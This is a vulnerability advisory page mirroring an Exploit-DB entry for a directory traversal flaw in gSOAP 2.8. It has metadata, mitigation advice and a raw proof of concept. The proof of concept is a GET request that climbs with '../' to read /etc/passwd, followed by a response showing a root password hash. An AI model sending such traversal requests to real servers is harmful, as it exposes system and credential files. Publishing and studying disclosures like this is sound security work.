gSOAP 2.8 - Directory Traversal

vendor:

gSOAP

by:

Numan Türle

7.5

CVSS

HIGH

Directory Traversal

CWE

Product Name: gSOAP

Affected Version From: 2.8

Affected Version To: 2.8

Patch Exists: YES

Related CWE: N/A

CPE: a:genivia:gsoap

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: N/A

2019

gSOAP 2.8 – Directory Traversal

A directory traversal vulnerability exists in gSOAP 2.8 which allows an attacker to read arbitrary files on the server. This is due to the application not properly sanitizing user-supplied input. An attacker can send a specially crafted HTTP request containing directory traversal characters (e.g. '../') to read arbitrary files on the server.

Mitigation:

The vendor has released a patch to address this issue. It is recommended to upgrade to the latest version of gSOAP.

Source

Exploit-DB raw data:

# Title: gSOAP 2.8 - Directory Traversal
# Author: Numan Türle
# Date: 2019-11-13
# Vendor Homepage: https://www.genivia.com/
# Version : gSOAP 2.8
# Software Link : https://www.genivia.com/products.html#gsoap


POC
---------

GET /../../../../../../../../../etc/passwd HTTP/1.1
Host: 10.200.106.101
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

Response
---------
HTTP/1.1 200 OK
Server: gSOAP/2.8
Content-Type: application/octet-stream
Content-Length: 51
Connection: close

root:$1$$qRPK7m23GJusamGpoGLby/:0:0::/root:/bin/sh